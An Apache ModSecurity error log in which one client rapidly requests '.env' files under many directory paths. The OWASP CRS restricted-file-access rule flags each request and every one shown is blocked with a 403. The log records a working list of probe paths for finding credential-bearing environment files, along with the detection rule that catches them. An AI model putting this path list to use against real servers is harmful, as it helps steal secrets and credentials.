[Mon May 11 18:06:47.282078 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/private/.env"] [unique_id "agH-l4W8yzYoWG_eyCW6fgAAAUg"]
[Mon May 11 18:06:47.282436 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-l4W8yzYoWG_eyCW6fgAAAUg"]
[Mon May 11 18:06:47.646182 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/application/.env"] [unique_id "agH-l4W8yzYoWG_eyCW6fwAAAUg"]
[Mon May 11 18:06:47.646424 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/application/.env"] [unique_id "agH-l4W8yzYoWG_eyCW6fwAAAUg"]
[Mon May 11 18:06:47.646699 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-l4W8yzYoWG_eyCW6fwAAAUg"]
[Mon May 11 18:06:47.925112 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/bootstrap/.env"] [unique_id "agH-l4W8yzYoWG_eyCW6gQAAAUg"]
[Mon May 11 18:06:47.925361 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/bootstrap/.env"] [unique_id "agH-l4W8yzYoWG_eyCW6gQAAAUg"]
[Mon May 11 18:06:47.925652 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-l4W8yzYoWG_eyCW6gQAAAUg"]
[Mon May 11 18:06:48.215842 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/database/.env"] [unique_id "agH-mIW8yzYoWG_eyCW6gwAAAUg"]
[Mon May 11 18:06:48.216061 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/database/.env"] [unique_id "agH-mIW8yzYoWG_eyCW6gwAAAUg"]
[Mon May 11 18:06:48.216375 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-mIW8yzYoWG_eyCW6gwAAAUg"]
[Mon May 11 18:06:48.463877 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/storage/.env"] [unique_id "agH-mIW8yzYoWG_eyCW6hAAAAUg"]
[Mon May 11 18:06:48.464102 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/storage/.env"] [unique_id "agH-mIW8yzYoWG_eyCW6hAAAAUg"]
[Mon May 11 18:06:48.464432 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-mIW8yzYoWG_eyCW6hAAAAUg"]
[Mon May 11 18:06:48.721582 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/var/www/.env"] [unique_id "agH-mIW8yzYoWG_eyCW6hQAAAUg"]
[Mon May 11 18:06:48.721802 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/var/www/.env"] [unique_id "agH-mIW8yzYoWG_eyCW6hQAAAUg"]
[Mon May 11 18:06:48.722095 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-mIW8yzYoWG_eyCW6hQAAAUg"]
[Mon May 11 18:06:48.974704 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/var/www/html/.env"] [unique_id "agH-mIW8yzYoWG_eyCW6hgAAAUg"]
[Mon May 11 18:06:48.974928 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/var/www/html/.env"] [unique_id "agH-mIW8yzYoWG_eyCW6hgAAAUg"]
[Mon May 11 18:06:48.975234 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-mIW8yzYoWG_eyCW6hgAAAUg"]
[Mon May 11 18:06:49.262231 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/current/.env"] [unique_id "agH-mYW8yzYoWG_eyCW6iAAAAUg"]
[Mon May 11 18:06:49.262457 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/current/.env"] [unique_id "agH-mYW8yzYoWG_eyCW6iAAAAUg"]
[Mon May 11 18:06:49.262747 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-mYW8yzYoWG_eyCW6iAAAAUg"]
[Mon May 11 18:06:49.661885 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/release/.env"] [unique_id "agH-mYW8yzYoWG_eyCW6iQAAAUg"]
[Mon May 11 18:06:49.662110 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/release/.env"] [unique_id "agH-mYW8yzYoWG_eyCW6iQAAAUg"]
[Mon May 11 18:06:49.662432 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-mYW8yzYoWG_eyCW6iQAAAUg"]
[Mon May 11 18:06:50.003600 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/releases/.env"] [unique_id "agH-moW8yzYoWG_eyCW6iwAAAUg"]
[Mon May 11 18:06:50.003837 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/releases/.env"] [unique_id "agH-moW8yzYoWG_eyCW6iwAAAUg"]
[Mon May 11 18:06:50.004125 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-moW8yzYoWG_eyCW6iwAAAUg"]
[Mon May 11 18:06:50.357818 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/shared/.env"] [unique_id "agH-moW8yzYoWG_eyCW6jAAAAUg"]
[Mon May 11 18:06:50.358033 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/shared/.env"] [unique_id "agH-moW8yzYoWG_eyCW6jAAAAUg"]
[Mon May 11 18:06:50.358338 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-moW8yzYoWG_eyCW6jAAAAUg"]
[Mon May 11 18:06:50.630398 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/deploy/.env"] [unique_id "agH-moW8yzYoWG_eyCW6jQAAAUg"]
[Mon May 11 18:06:50.630628 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/deploy/.env"] [unique_id "agH-moW8yzYoWG_eyCW6jQAAAUg"]
[Mon May 11 18:06:50.630913 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-moW8yzYoWG_eyCW6jQAAAUg"]
[Mon May 11 18:06:50.966852 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/build/.env"] [unique_id "agH-moW8yzYoWG_eyCW6jgAAAUg"]
[Mon May 11 18:06:50.967078 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/build/.env"] [unique_id "agH-moW8yzYoWG_eyCW6jgAAAUg"]
[Mon May 11 18:06:50.967368 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH-moW8yzYoWG_eyCW6jgAAAUg"]
[Mon May 11 18:06:51.390424 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dist/.env"] [unique_id "agH-m4W8yzYoWG_eyCW6kAAAAUg"]
[Mon May 11 18:06:51.390662 2026] [security2:error] [pid 1424905:tid 1424916] [client 18.179.223.6:42580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dist/.env"] [unique_id "agH-m4W8yzYoWG_eyCW6kAAAAUg"]
